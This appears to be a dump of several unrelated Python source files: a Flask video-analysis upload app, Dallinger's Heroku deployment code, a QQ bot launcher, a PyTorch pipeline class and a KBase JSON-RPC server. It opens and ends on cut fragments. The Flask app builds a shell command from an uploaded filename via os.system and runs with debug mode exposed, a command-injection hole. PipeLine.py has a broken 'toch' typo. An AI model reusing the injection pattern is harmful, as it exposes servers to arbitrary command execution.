traceback) -> None: self.close()
apptest.py
import os from flask import Flask, render_template, request, redirect, url_for from run_edi import talking_time_count,gender_time_count from run_edi import main import time import threading # from yolov5.detect import get_opt, obj_detect #added for detect convert app = Flask(__name__) begin = 0 stop = 0 print_result = 'this will take a while' file_path = '' @app.route('/') def index(): return render_template('index.html') @app.route('/', methods=['POST','GET']) def upload_file(): global begin global print_result global gender_result global file_path global stop if begin == 0: stop = 0 #first print_result = 'this will take a while' uploaded_file = request.files['file'] basepath = os.path.dirname(__file__) if uploaded_file.filename != '': file_path = os.path.join( basepath, 'data',uploaded_file.filename) uploaded_file.save(file_path) begin = 1 t1 = threading.Thread(target=test1) t1.start() return render_template('result.html',name = print_result, stop=stop) def test1(): global begin if begin == 1: global file_path global print_result global gender_result global stop command_line = 'python run_edi.py --video '+file_path os.system(command_line) print_result= talking_time_count (file_path) gender_result =gender_time_count(file_path) print_result = print_result+gender_result print (print_result) Percent = open("percent.txt", mode = "w") Percent.write('0%') Percent.close() print ('analysis finished, printing on html') stop = 1 begin = 0 #return render_template('result.html',name= print_result, stop=stop) @app.route('/result', methods=['POST','GET']) def result(): global print_result global gender_result global stop if stop == 0: Percent = open("percent.txt", mode = "r") print_result = Percent.read() Percent.close() return render_template('result.html',name= print_result, stop=stop) if __name__ == '__main__': app.run(port=9999,debug=True,host='0.0.0.0' )
deployment.py
# -*- coding: utf-8 -*- from __future__ import unicode_literals import codecs import json import os import pkg_resources import re import redis import requests import shutil import six import tempfile import threading import time from six.moves import shlex_quote as quote from six.moves.urllib.parse import urlparse from six.moves.urllib.parse import urlunparse from unicodedata import normalize from dallinger import data from dallinger import db from dallinger import heroku from dallinger import recruiters from dallinger import registration from dallinger.config import get_config from dallinger.heroku.tools import HerokuApp from dallinger.heroku.tools import HerokuLocalWrapper from dallinger.utils import connect_to_redis from dallinger.utils import dallinger_package_path from dallinger.utils import ensure_directory from dallinger.utils import get_base_url from dallinger.utils import open_browser from dallinger.utils import GitClient from faker import Faker fake = Faker() def exclusion_policy(): """Returns a callable which, when passed a directory path and a list of files in that directory, will return a subset of the files which should be excluded from a copy or some other action. See https://docs.python.org/3/library/shutil.html#shutil.ignore_patterns """ patterns = set( [ ".git", "config.txt", "*.db", "*.dmg", "node_modules", "snapshots", "data", "server.log", "__pycache__", ] ) return shutil.ignore_patterns(*patterns) class ExperimentFileSource(object): """Treat an experiment directory as a potential source of files for copying to a temp directory as part of a deployment (debug or otherwise). """ def __init__(self, root_dir="."): self.root = root_dir self.git = GitClient() @property def files(self): """A Set of all files copyable in the source directory, accounting for exclusions. """ return {path for path in self._walk()} @property def size(self): """Combined size of all files, accounting for exclusions. """ return sum([os.path.getsize(path) for path in self._walk()]) def selective_copy_to(self, destination): """Write files from the source directory to another directory, skipping files excluded by the general exclusion_policy, plus any files ignored by git configuration. """ for path in self.files: subpath = os.path.relpath(path, start=self.root) target_folder = os.path.join(destination, os.path.dirname(subpath)) ensure_directory(target_folder) shutil.copy2(path, target_folder) def _walk(self): # The GitClient and os.walk may return different representations of the # same unicode characters, so we use unicodedata.normalize() for # comparisons: # list(name_from_git) # ['å', ' ', 'f', 'i', 'l', 'e', '.', 't', 'x', 't'] # list(from_os_walk) # ['a', '̊', ' ', 'f', 'i', 'l', 'e', '.', 't', 'x', 't'] exclusions = exclusion_policy() git_files = { os.path.join(self.root, normalize("NFC", f)) for f in self.git.files() } for dirpath, dirnames, filenames in os.walk(self.root, topdown=True): current_exclusions = exclusions(dirpath, os.listdir(dirpath)) # Modifying dirnames in-place will prune the subsequent files and # directories visited by os.walk. This is only possible when # topdown = True dirnames[:] = [d for d in dirnames if d not in current_exclusions] legit_files = { os.path.join(dirpath, f) for f in filenames if f not in current_exclusions } if git_files: normalized = { normalize("NFC", six.text_type(f)): f for f in legit_files } legit_files = {v for k, v in normalized.items() if k in git_files} for legit in legit_files: yield legit class ExplicitFileSource(object): """Add files that are explicitly requested by the experimenter with a hook function. """ def __init__(self, root_dir="."): self.root = root_dir def _get_mapping(self, dst): from dallinger.config import initialize_experiment_package initialize_experiment_package(dst) from dallinger.experiment import load exp_class = load() extra_files = getattr(exp_class, "extra_files", None) if extra_files is None: try: from dallinger_experiment.experiment import extra_files except ImportError: try: from dallinger_experiment.dallinger_experiment import extra_files except ImportError: pass if extra_files is not None: for src, filename in extra_files(): filename = filename.lstrip("/") if os.path.isdir(src): for dirpath, dirnames, filenames in os.walk(src, topdown=True): for fn in filenames: dst_fileparts = [dst, filename] + dirnames + [fn] dst_filepath = os.path.join(*dst_fileparts) yield ( os.path.join(dirpath, fn), dst_filepath, ) else: dst_filepath = os.path.join(dst, filename) yield (src, dst_filepath) @property def files(self): """A Set of all files copyable in the source directory, accounting for exclusions. """ return {src for (src, dst) in self._get_mapping("")} @property def size(self): """Combined size of all files, accounting for exclusions. """ return sum([os.path.getsize(path) for path in self.files]) def selective_copy_to(self, destination): """Write files from the source directory to another directory, skipping files excluded by the general exclusion_policy, plus any files ignored by git configuration. """ for from_path, to_path in self._get_mapping(destination): target_folder = os.path.dirname(to_path) ensure_directory(target_folder) shutil.copyfile(from_path, to_path) def assemble_experiment_temp_dir(config): """Create a temp directory from which to run an experiment. The new directory will include: - Copies of custom experiment files which don't match the exclusion policy - Templates and static resources from Dallinger - An export of the loaded configuration - Heroku-specific files (Procile, runtime.txt) from Dallinger Assumes the experiment root directory is the current working directory. Returns the absolute path of the new directory. """ exp_id = config.get("id") dst = os.path.join(tempfile.mkdtemp(), exp_id) # Copy local experiment files, minus some ExperimentFileSource(os.getcwd()).selective_copy_to(dst) # Export the loaded configuration config.write(filter_sensitive=True, directory=dst) # Save the experiment id with open(os.path.join(dst, "experiment_id.txt"), "w") as file: file.write(exp_id) # Copy Dallinger files dallinger_root = dallinger_package_path() ensure_directory(os.path.join(dst, "static", "scripts")) ensure_directory(os.path.join(dst, "static", "css")) frontend_files = [ os.path.join("static", "css", "bootstrap.min.css"), os.path.join("static", "css", "dallinger.css"), os.path.join("static", "css", "dashboard.css"), os.path.join("static", "scripts", "jquery-3.5.1.min.js"), os.path.join("static", "scripts", "popper.min.js"), os.path.join("static", "scripts", "bootstrap.min.js"), os.path.join("static", "scripts", "clipboard.min.js"), os.path.join("static", "scripts", "dallinger2.js"), os.path.join("static", "scripts", "network-monitor.js"), os.path.join("static", "scripts", "reqwest.min.js"), os.path.join("static", "scripts", "require.js"), os.path.join("static", "scripts", "reconnecting-websocket.js"), os.path.join("static", "scripts", "spin.min.js"), os.path.join("static", "scripts", "tracker.js"), os.path.join("static", "scripts", "store+json2.min.js"), os.path.join("templates", "error.html"), os.path.join("templates", "error-complete.html"), os.path.join("templates", "launch.html"), os.path.join("templates", "complete.html"), os.path.join("templates", "questionnaire.html"), os.path.join("templates", "thanks.html"), os.path.join("templates", "waiting.html"), os.path.join("templates", "login.html"), os.path.join("templates", "dashboard_lifecycle.html"), os.path.join("templates", "dashboard_database.html"), os.path.join("templates", "dashboard_heroku.html"), os.path.join("templates", "dashboard_home.html"), os.path.join("templates", "dashboard_monitor.html"), os.path.join("templates", "dashboard_mturk.html"), os.path.join("static", "robots.txt"), ] frontend_dirs = [os.path.join("templates", "base")] for filename in frontend_files: src = os.path.join(dallinger_root, "frontend", filename) dst_filepath = os.path.join(dst, filename) if not os.path.exists(dst_filepath): shutil.copy(src, dst_filepath) for filename in frontend_dirs: src = os.path.join(dallinger_root, "frontend", filename) dst_filepath = os.path.join(dst, filename) if not os.path.exists(dst_filepath): shutil.copytree(src, dst_filepath) # Copy Heroku files heroku_files = ["Procfile"] for filename in heroku_files: src = os.path.join(dallinger_root, "heroku", filename) shutil.copy(src, os.path.join(dst, filename)) # Write out a runtime.txt file based on configuration pyversion = config.get("heroku_python_version") with open(os.path.join(dst, "runtime.txt"), "w") as file: file.write("python-{}".format(pyversion)) if not config.get("clock_on"): # If the clock process has been disabled, overwrite the Procfile: src = os.path.join(dallinger_root, "heroku", "Procfile_no_clock") shutil.copy(src, os.path.join(dst, "Procfile")) ExplicitFileSource(os.getcwd()).selective_copy_to(dst) return dst def setup_experiment(log, debug=True, verbose=False, app=None, exp_config=None): """Checks the experiment's python dependencies, then prepares a temp directory with files merged from the custom experiment and Dallinger. The resulting directory includes all the files necessary to deploy to Heroku. """ # Verify that the Postgres server is running. try: db.check_connection() except Exception: log("There was a problem connecting to the Postgres database!") raise # Check that the demo-specific requirements are satisfied. try: with open("requirements.txt", "r") as f: dependencies = [r for r in f.readlines() if r[:3] != "-e "] except (OSError, IOError): dependencies = [] pkg_resources.require(dependencies) # Generate a unique id for this experiment. from dallinger.experiment import Experiment experiment_uid = heroku_app_id = Experiment.make_uuid(app) log("Experiment UID: {}".format(experiment_uid)) # Load and update the config config = get_config() if not config.ready: config.load() # if exp_config: config.extend(exp_config) # If the user provided an app name, store it. We'll use it as the basis for # the Heroku app ID. We still have a fair amount of ambiguity around what # this value actually represents (it's not used as _only_ the Heroku app ID). if app: heroku_app_id = str(app) log("Using custom Heroku ID root: {}".format(heroku_app_id)) config.extend( { "id": six.text_type(experiment_uid), "heroku_app_id_root": six.text_type(heroku_app_id), } ) if not config.get("dashboard_password", None): config.set("dashboard_password", fake.password(length=20, special_chars=False)) temp_dir = assemble_experiment_temp_dir(config) log("Deployment temp directory: {}".format(temp_dir), chevrons=False) # Zip up the temporary directory and place it in the cwd. if not debug: log("Freezing the experiment package...") shutil.make_archive( os.path.join(os.getcwd(), "snapshots", heroku_app_id + "-code"), "zip", temp_dir, ) return (heroku_app_id, temp_dir) INITIAL_DELAY = 1 BACKOFF_FACTOR = 2 MAX_ATTEMPTS = 6 def _handle_launch_data(url, error, delay=INITIAL_DELAY, attempts=MAX_ATTEMPTS): for remaining_attempt in sorted(range(attempts), reverse=True): # [3, 2, 1, 0] time.sleep(delay) launch_request = requests.post(url) try: launch_data = launch_request.json() except ValueError: error( "Error parsing response from {}, " "check web dyno logs for details: {}".format(url, launch_request.text) ) raise # Early return if successful if launch_request.ok: return launch_data error( "Error accessing {} ({}):\n{}".format( url, launch_request.status_code, launch_request.text ) ) if remaining_attempt: delay = delay * BACKOFF_FACTOR next_attempt_count = attempts - (remaining_attempt - 1) error( "Experiment launch failed. Trying again " "(attempt {} of {}) in {} seconds ...".format( next_attempt_count, attempts, delay ) ) error("Experiment launch failed, check web dyno logs for details.") if launch_data.get("message"): error(launch_data["message"]) launch_request.raise_for_status() def deploy_sandbox_shared_setup( log, verbose=True, app=None, exp_config=None, prelaunch_actions=None ): """Set up Git, push to Heroku, and launch the app.""" if verbose: out = None else: out = open(os.devnull, "w") config = get_config() if not config.ready: config.load() heroku.sanity_check(config) (heroku_app_id, tmp) = setup_experiment( log, debug=False, app=app, exp_config=exp_config ) # Register the experiment using all configured registration services. if config.get("mode") == "live": log("Registering the experiment on configured services...") registration.register(heroku_app_id, snapshot=None) # Log in to Heroku if we aren't already. log("Making sure that you are logged in to Heroku.") heroku.log_in() config.set("heroku_auth_token", heroku.auth_token()) log("", chevrons=False) # Change to temporary directory. cwd = os.getcwd() os.chdir(tmp) # Commit Heroku-specific files to tmp folder's git repo. git = GitClient(output=out) git.init() git.add("--all") git.commit('"Experiment {}"'.format(heroku_app_id)) # Initialize the app on Heroku. log("Initializing app on Heroku...") team = config.get("heroku_team", None) heroku_app = HerokuApp(dallinger_uid=heroku_app_id, output=out, team=team) heroku_app.bootstrap() heroku_app.buildpack("https://github.com/stomita/heroku-buildpack-phantomjs") heroku_app.set("PYTHON_NO_SQLITE3", "true") # Set up add-ons and AWS environment variables. database_size = config.get("database_size") redis_size = config.get("redis_size") addons = [ "heroku-postgresql:{}".format(quote(database_size)), "heroku-redis:{}".format(quote(redis_size)), "papertrail", ] if config.get("sentry"): addons.append("sentry") for name in addons: heroku_app.addon(name) heroku_config = { "aws_access_key_id": config["aws_access_key_id"], "aws_secret_access_key": config["aws_secret_access_key"], "aws_region": config["aws_region"], "auto_recruit": config["auto_recruit"], "smtp_username": config["smtp_username"], "smtp_password": config["smtp_password"], "whimsical": config["whimsical"], "FLASK_SECRET_KEY": codecs.encode(os.urandom(16), "hex").decode("ascii"), } # Set up the preferred class as an environment variable, if one is set # This is needed before the config is parsed, but we also store it in the # config to make things easier for recording into bundles. preferred_class = config.get("EXPERIMENT_CLASS_NAME", None) if preferred_class: heroku_config["EXPERIMENT_CLASS_NAME"] = preferred_class heroku_app.set_multiple(**heroku_config) # Wait for Redis database to be ready. log("Waiting for Redis...", nl=False) ready = False while not ready: try: r = connect_to_redis(url=heroku_app.redis_url) r.set("foo", "bar") ready = True log("\n✓ connected at {}".format(heroku_app.redis_url), chevrons=False) except (ValueError, redis.exceptions.ConnectionError): time.sleep(2) log(".", chevrons=False, nl=False) log("Saving the URL of the postgres database...") config.extend({"database_url": heroku_app.db_url}) config.write() git.add("config.txt") git.commit("Save URL for database") log("Generating dashboard links...") heroku_addons = heroku_app.addon_parameters() heroku_addons = json.dumps(heroku_addons) if six.PY2: heroku_addons = heroku_addons.decode("utf-8") config.extend({"infrastructure_debug_details": heroku_addons}) config.write() git.add("config.txt") git.commit("Save URLs for heroku addon management") # Launch the Heroku app. log("Pushing code to Heroku...") git.push(remote="heroku", branch="HEAD:master") log("Scaling up the dynos...") default_size = config.get("dyno_type") for process in ["web", "worker"]: size = config.get("dyno_type_" + process, default_size) qty = config.get("num_dynos_" + process) heroku_app.scale_up_dyno(process, qty, size) if config.get("clock_on"): heroku_app.scale_up_dyno("clock", 1, size) if prelaunch_actions is not None: for task in prelaunch_actions: task(heroku_app, config) # Launch the experiment. log("Launching the experiment on the remote server and starting recruitment...") launch_url = "{}/launch".format(heroku_app.url) log("Calling {}".format(launch_url), chevrons=False) launch_data = _handle_launch_data(launch_url, error=log) result = { "app_name": heroku_app.name, "app_home": heroku_app.url, "dashboard_url": "{}/dashboard/".format(heroku_app.url), "recruitment_msg": launch_data.get("recruitment_msg", None), } log("Experiment details:") log("App home: {}".format(result["app_home"]), chevrons=False) log("Dashboard URL: {}".format(result["dashboard_url"]), chevrons=False) log("Dashboard user: {}".format(config.get("dashboard_user")), chevrons=False) log( "Dashboard password: {}".format(config.get("dashboard_password")), chevrons=False, ) log("Recruiter info:") log(result["recruitment_msg"], chevrons=False) # Return to the branch whence we came. os.chdir(cwd) log( "Completed Heroku deployment of experiment ID {} using app ID {}.".format( config.get("id"), heroku_app_id ) ) return result class HerokuLocalDeployment(object): exp_id = None tmp_dir = None dispatch = {} # Subclass may provide handlers for Heroku process output environ = None def configure(self): self.exp_config.update({"mode": "debug", "loglevel": 0}) def setup(self): self.exp_id, self.tmp_dir = setup_experiment( self.out.log, exp_config=self.exp_config ) def update_dir(self): os.chdir(self.tmp_dir) # Update the logfile to the new directory config = get_config() logfile = config.get("logfile") if logfile and logfile != "-": logfile = os.path.join(self.original_dir, logfile) config.extend({"logfile": logfile}) config.write() def run(self): """Set up the environment, get a HerokuLocalWrapper instance, and pass it to the concrete class's execute() method. """ self.configure() self.setup() self.update_dir() db.init_db(drop_all=True) config = get_config() environ = None if self.environ: environ = os.environ.copy() environ.update(self.environ) self.out.log("Starting up the Heroku Local server...") with HerokuLocalWrapper( config, self.out, verbose=self.verbose, env=environ ) as wrapper: try: self.execute(wrapper) except KeyboardInterrupt: pass finally: os.chdir(self.original_dir) self.cleanup() def notify(self, message): """Callback function which checks lines of output, tries to match against regex defined in subclass's "dispatch" dict, and passes through to a handler on match. """ for regex, handler in self.dispatch.items(): match = re.search(regex, message) if match: handler = getattr(self, handler) return handler(match) def execute(self, heroku): raise NotImplementedError() class DebugDeployment(HerokuLocalDeployment): dispatch = { r"[^\"]{} (.*)$".format(recruiters.NEW_RECRUIT_LOG_PREFIX): "new_recruit", r"{}".format(recruiters.CLOSE_RECRUITMENT_LOG_PREFIX): "recruitment_closed", } def __init__(self, output, verbose, bot, proxy_port, exp_config, no_browsers=False): self.out = output self.verbose = verbose self.bot = bot self.exp_config = exp_config or {} self.proxy_port = proxy_port self.original_dir = os.getcwd() self.complete = False self.status_thread = None self.no_browsers = no_browsers self.environ = { "FLASK_SECRET_KEY": codecs.encode(os.urandom(16), "hex").decode("ascii"), } def configure(self): super(DebugDeployment, self).configure() if self.bot: self.exp_config["recruiter"] = "bots" def execute(self, heroku): base_url = get_base_url() self.out.log("Server is running on {}. Press Ctrl+C to exit.".format(base_url)) self.out.log("Launching the experiment...") try: result = _handle_launch_data( "{}/launch".format(base_url), error=self.out.error, attempts=1 ) except Exception: # Show output from server self.dispatch[r"POST /launch"] = "launch_request_complete" heroku.monitor(listener=self.notify) else: if result["status"] == "success": self.out.log(result["recruitment_msg"]) dashboard_url = "{}/dashboard/".format(get_base_url()) self.display_dashboard_access_details(dashboard_url) if not self.no_browsers: self.open_dashboard(dashboard_url) self.heroku = heroku self.out.log( "Monitoring the Heroku Local server for recruitment or completion..." ) heroku.monitor(listener=self.notify) def launch_request_complete(self, match): return HerokuLocalWrapper.MONITOR_STOP def cleanup(self): self.out.log("Completed debugging of experiment with id " + self.exp_id) self.complete = True def new_recruit(self, match): """Dispatched to by notify(). If a recruitment request has been issued, open a browser window for the a new participant (in this case the person doing local debugging). """ self.out.log("new recruitment request!") if self.no_browsers: self.out.log(recruiters.NEW_RECRUIT_LOG_PREFIX + ": " + match.group(1)) return url = match.group(1) if self.proxy_port is not None: self.out.log("Using proxy port {}".format(self.proxy_port)) url = url.replace(str(get_config().get("base_port")), self.proxy_port) open_browser(url) def display_dashboard_access_details(self, url): config = get_config() self.out.log("Experiment dashboard: {}".format(url)) self.out.log( "Dashboard user: {} password: {}".format( config.get("dashboard_user"), config.get("dashboard_password"), ) ) def open_dashboard(self, url): config = get_config() self.out.log("Opening dashboard") parsed = list(urlparse(url)) parsed[1] = "{}:{}@{}".format( config.get("dashboard_user"), config.get("dashboard_password"), parsed[1], ) open_browser(urlunparse(parsed)) def recruitment_closed(self, match): """Recruitment is closed. Start a thread to check the experiment summary. """ if self.no_browsers: self.out.log(recruiters.CLOSE_RECRUITMENT_LOG_PREFIX) if self.status_thread is None: self.status_thread = threading.Thread(target=self.check_status) self.status_thread.start() def check_status(self): """Check the output of the summary route until the experiment is complete, then we can stop monitoring Heroku subprocess output. """ self.out.log("Recruitment is complete. Waiting for experiment completion...") base_url = get_base_url() status_url = base_url + "/summary" while not self.complete: time.sleep(10) try: resp = requests.get(status_url) exp_data = resp.json() except (ValueError, requests.exceptions.RequestException): self.out.error("Error fetching experiment status.") else: self.out.log("Experiment summary: {}".format(exp_data)) if exp_data.get("completed", False): self.out.log("Experiment completed, all nodes filled.") self.complete = True self.heroku.stop() def notify(self, message): """Monitor output from heroku process. This overrides the base class's `notify` to make sure that we stop if the status-monitoring thread has determined that the experiment is complete. """ if self.complete: return HerokuLocalWrapper.MONITOR_STOP return super(DebugDeployment, self).notify(message) class LoaderDeployment(HerokuLocalDeployment): dispatch = {"Replay ready: (.*)$": "start_replay"} def __init__(self, app_id, output, verbose, exp_config): self.app_id = app_id self.out = output self.verbose = verbose self.exp_config = exp_config or {} self.original_dir = os.getcwd() self.zip_path = None def configure(self): self.exp_config.update({"mode": "debug", "loglevel": 0}) self.zip_path = data.find_experiment_export(self.app_id) if self.zip_path is None: msg = 'Dataset export for app id "{}" could not be found.' raise IOError(msg.format(self.app_id)) def setup(self): self.exp_id, self.tmp_dir = setup_experiment( self.out.log, app=self.app_id, exp_config=self.exp_config ) def execute(self, heroku): """Start the server, load the zip file into the database, then loop until terminated with <control>-c. """ db.init_db(drop_all=True) self.out.log( "Ingesting dataset from {}...".format(os.path.basename(self.zip_path)) ) data.ingest_zip(self.zip_path) base_url = get_base_url() self.out.log("Server is running on {}. Press Ctrl+C to exit.".format(base_url)) if self.exp_config.get("replay"): self.out.log("Launching the experiment...") time.sleep(4) _handle_launch_data("{}/launch".format(base_url), error=self.out.error) heroku.monitor(listener=self.notify) # Just run until interrupted: while self.keep_running(): time.sleep(1) def start_replay(self, match): """Dispatched to by notify(). If a recruitment request has been issued, open a browser window for the a new participant (in this case the person doing local debugging). """ self.out.log("replay ready!") url = match.group(1) open_browser(url) def cleanup(self): self.out.log("Terminating dataset load for experiment {}".format(self.exp_id)) def keep_running(self): # This is a separate method so that it can be replaced in tests return True
main.py
from Util.config import config from api import app import threading from qqbot import bili_monitor, start_qqbot_loop from rule import update_rules, update_keywords_list import logging from gevent.pywsgi import WSGIServer logging.basicConfig( level=logging.INFO, format="%(asctime)s - %(message)s", datefmt="%Y-%m-%d %H:%M:%S" ) def run_flask(): server = WSGIServer(("", config["api"]["port"]), app, log=app.logger) server.serve_forever() if __name__ == "__main__": update_rules() update_keywords_list() threading.Thread(target=run_flask, daemon=True).start() threading.Thread(target=bili_monitor, daemon=True).start() start_qqbot_loop() threading.Event().wait()
PipeLine.py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Copyright (c) 2019, Linear Labs Technology Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import torch,yajl as json from multiprocessing import Process from ..Common.Compiler import Compile from ..Common.utils import StrOrDict as sod from ..RabbitMQ.Host import worker import torch from torch import nn class DummyClass: def __init__(self): pass def __call__(self,x): return x class ParallelPipe: def __init__(self,cfg,as_dict=True): # super(ParallelPipe,self).__init__() cfg = sod(cfg) self.models = {} self.as_dict=as_dict self.no_grad = False for k,v in cfg.items(): self.models[k] = Compile( json.loads(open(cfg[k],'r').read() ) ) if isinstance(cfg[k],str) else ParallelPipe( cfg[k] ) def load(self,files): for k,v in files.items(): if k in self.models: self.models[k].load_state_dict(torch.load(v)) def train(self): self.no_grad = False for f in self.models.keys():self.models[f].train() def eval(self): self.no_grad = True for f in self.models.keys():self.models[f].eval() def __call__(self,x): if self.no_grad: with toch.no_grad(): return dict( zip( self.models.keys(), [f(x) for f in self.models.values()] ) ) if self.as_dict else \ [f(x) for f in self.models.values()] else: return dict( zip( self.models.keys(), [f(x) for f in self.models.values()] ) ) if self.as_dict else \ [f(x) for f in self.models.values()] def __str__(self): import texttable as tt tab = tt.Texttable() headings = list(self.models.keys()) tab.header(headings) tab.add_row(self.models.items()) return tab.draw() def __repr__(self): return self.__str__() class Pipe: def __init__(self,cfg): # super(Pipe,self).__init__() cfg = sod(cfg) self.cfg = cfg self.order = [] self.models = {} self.no_grad = False for k,v in cfg.items(): if "Load" in k:continue self.order.append(k) self.models[k] = Compile( json.loads(open(v,'r').read() ) ) if isinstance(v,str) else ParallelPipe( v ) if "Load" in cfg: for k,v in cfg['Load'].items(): try: self.models[k].load_state_dict(torch.load(v)) except: self.models[k].load(cfg['Load']) def train(self): self.no_grad = False for f in self.order:self.models[f].train() def eval(self): self.no_grad = True for f in self.order:self.models[f].eval() def __call__(self,x): if self.no_grad: with torch.no_grad(): for f in self.order: x = self.models[f](x) else: for f in self.order: x = self.models[f](x) return x def __str__(self): import texttable as tt s = '' for k in self.models.keys(): tab = tt.Texttable() headings = [k] tab.header(headings) tab.add_row( [ self.models[k] ] ) s += tab.draw() + '\n' return s class PipeLine(nn.Module): backend = 'rmq' def __init__(self,cfg=None): super(PipeLine,self).__init__() self.pipes = [] self.threads = [] self.running = False if cfg:self.cfg = sod(cfg) def __exit__(self, exc_type, exc_value, traceback):self.close() def __str__(self): s = '' for p in self.pipes: s += str(p)+'\n' return s def __repr__(self): return self.__str__() def close(self): if self.running: for t in self.threads: t.join() t.close() self.running = False def __call__(self,x): for f in self.pipes:x = f(x) return x def run(self): self.running = True self.threads = [] if self.backend == 'rmq': for i in range(self.cfg['threads']): self.threads.append(Process(target=worker,args=(self.cfg['addr'],self.cfg['queue'],self.pipes ))) self.threads[i].start() def register_pipes(self,pipes): for p in pipes:self.register_pipe(p) def register_pipe(self,pipe): assert isinstance(pipe,(Pipe,ParallelPipe)), 'the pipe you want to add to the PipeLine is not a Pipe!' self.pipes.append(pipe) return self
ContigCountServer.py
#!/usr/bin/env python from wsgiref.simple_server import make_server import sys import json import traceback import datetime from multiprocessing import Process from getopt import getopt, GetoptError from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\ JSONRPCError, ServerError, InvalidRequestError from os import environ from ConfigParser import ConfigParser from biokbase import log import biokbase.nexus import requests as _requests import urlparse as _urlparse import random as _random import os DEPLOY = 'KB_DEPLOYMENT_CONFIG' SERVICE = 'KB_SERVICE_NAME' # Note that the error fields do not match the 2.0 JSONRPC spec def get_config_file(): return environ.get(DEPLOY, None) def get_service_name(): return environ.get(SERVICE, None) def get_config(): if not get_config_file(): return None retconfig = {} config = ConfigParser() config.read(get_config_file()) for nameval in config.items(get_service_name() or 'ContigCount'): retconfig[nameval[0]] = nameval[1] return retconfig config = get_config() from ContigCount.ContigCountImpl import ContigCount impl_ContigCount = ContigCount(config) class JSONObjectEncoder(json.JSONEncoder): def default(self, obj): if isinstance(obj, set): return list(obj) if isinstance(obj, frozenset): return list(obj) if hasattr(obj, 'toJSONable'): return obj.toJSONable() return json.JSONEncoder.default(self, obj) sync_methods = {} async_run_methods = {} async_check_methods = {} async_run_methods['ContigCount.count_contigs_async'] = ['ContigCount', 'count_contigs'] async_check_methods['ContigCount.count_contigs_check'] = ['ContigCount', 'count_contigs'] sync_methods['ContigCount.count_contigs'] = True class AsyncJobServiceClient(object): def __init__(self, timeout=30 * 60, token=None, ignore_authrc=True, trust_all_ssl_certificates=False): url = environ.get('KB_JOB_SERVICE_URL', None) if url is None and config is not None: url = config.get('job-service-url') if url is None: raise ValueError('Neither \'job-service-url\' parameter is defined in '+ 'configuration nor \'KB_JOB_SERVICE_URL\' variable is defined in system') scheme, _, _, _, _, _ = _urlparse.urlparse(url) if scheme not in ['http', 'https']: raise ValueError(url + " isn't a valid http url") self.url = url self.timeout = int(timeout) self._headers = dict() self.trust_all_ssl_certificates = trust_all_ssl_certificates if token is None: raise ValueError('Authentication is required for async methods') self._headers['AUTHORIZATION'] = token if self.timeout < 1: raise ValueError('Timeout value must be at least 1 second') def _call(self, method, params, json_rpc_call_context = None): arg_hash = {'method': method, 'params': params, 'version': '1.1', 'id': str(_random.random())[2:] } if json_rpc_call_context: arg_hash['context'] = json_rpc_call_context body = json.dumps(arg_hash, cls=JSONObjectEncoder) ret = _requests.post(self.url, data=body, headers=self._headers, timeout=self.timeout, verify=not self.trust_all_ssl_certificates) if ret.status_code == _requests.codes.server_error: if 'content-type' in ret.headers and ret.headers['content-type'] == 'application/json': err = json.loads(ret.text) if 'error' in err: raise ServerError(**err['error']) else: raise ServerError('Unknown', 0, ret.text) else: raise ServerError('Unknown', 0, ret.text) if ret.status_code != _requests.codes.OK: ret.raise_for_status() resp = json.loads(ret.text) if 'result' not in resp: raise ServerError('Unknown', 0, 'An unknown server error occurred') return resp['result'] def run_job(self, run_job_params, json_rpc_call_context = None): return self._call('KBaseJobService.run_job', [run_job_params], json_rpc_call_context)[0] def check_job(self, job_id, json_rpc_call_context = None): return self._call('KBaseJobService.check_job', [job_id], json_rpc_call_context)[0] class JSONRPCServiceCustom(JSONRPCService): def call(self, ctx, jsondata): """ Calls jsonrpc service's method and returns its return value in a JSON string or None if there is none. Arguments: jsondata -- remote method call in jsonrpc format """ result = self.call_py(ctx, jsondata) if result is not None: return json.dumps(result, cls=JSONObjectEncoder) return None def _call_method(self, ctx, request): """Calls given method with given params and returns it value.""" method = self.method_data[request['method']]['method'] params = request['params'] result = None try: if isinstance(params, list): # Does it have enough arguments? if len(params) < self._man_args(method) - 1: raise InvalidParamsError('not enough arguments') # Does it have too many arguments? if(not self._vargs(method) and len(params) > self._max_args(method) - 1): raise InvalidParamsError('too many arguments') result = method(ctx, *params) elif isinstance(params, dict): # Do not accept keyword arguments if the jsonrpc version is # not >=1.1. if request['jsonrpc'] < 11: raise KeywordError result = method(ctx, **params) else: # No params result = method(ctx) except JSONRPCError: raise except Exception as e: # log.exception('method %s threw an exception' % request['method']) # Exception was raised inside the method. newerr = ServerError() newerr.trace = traceback.format_exc() newerr.data = e.__str__() raise newerr return result def call_py(self, ctx, jsondata): """ Calls jsonrpc service's method and returns its return value in python object format or None if there is none. This method is same as call() except the return value is a python object instead of JSON string. This method is mainly only useful for debugging purposes. """ rdata = jsondata # we already deserialize the json string earlier in the server code, no # need to do it again # try: # rdata = json.loads(jsondata) # except ValueError: # raise ParseError # set some default values for error handling request = self._get_default_vals() if isinstance(rdata, dict) and rdata: # It's a single request. self._fill_request(request, rdata) respond = self._handle_request(ctx, request) # Don't respond to notifications if respond is None: return None return respond elif isinstance(rdata, list) and rdata: # It's a batch. requests = [] responds = [] for rdata_ in rdata: # set some default values for error handling request_ = self._get_default_vals() self._fill_request(request_, rdata_) requests.append(request_) for request_ in requests: respond = self._handle_request(ctx, request_) # Don't respond to notifications if respond is not None: responds.append(respond) if responds: return responds # Nothing to respond. return None else: # empty dict, list or wrong type raise InvalidRequestError def _handle_request(self, ctx, request): """Handles given request and returns its response.""" if self.method_data[request['method']].has_key('types'): # @IgnorePep8 self._validate_params_types(request['method'], request['params']) result = self._call_method(ctx, request) # Do not respond to notifications. if request['id'] is None: return None respond = {} self._fill_ver(request['jsonrpc'], respond) respond['result'] = result respond['id'] = request['id'] return respond class MethodContext(dict): def __init__(self, logger): self['client_ip'] = None self['user_id'] = None self['authenticated'] = None self['token'] = None self['module'] = None self['method'] = None self['call_id'] = None self['rpc_context'] = None self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3']) self._logger = logger def log_err(self, message): self._log(log.ERR, message) def log_info(self, message): self._log(log.INFO, 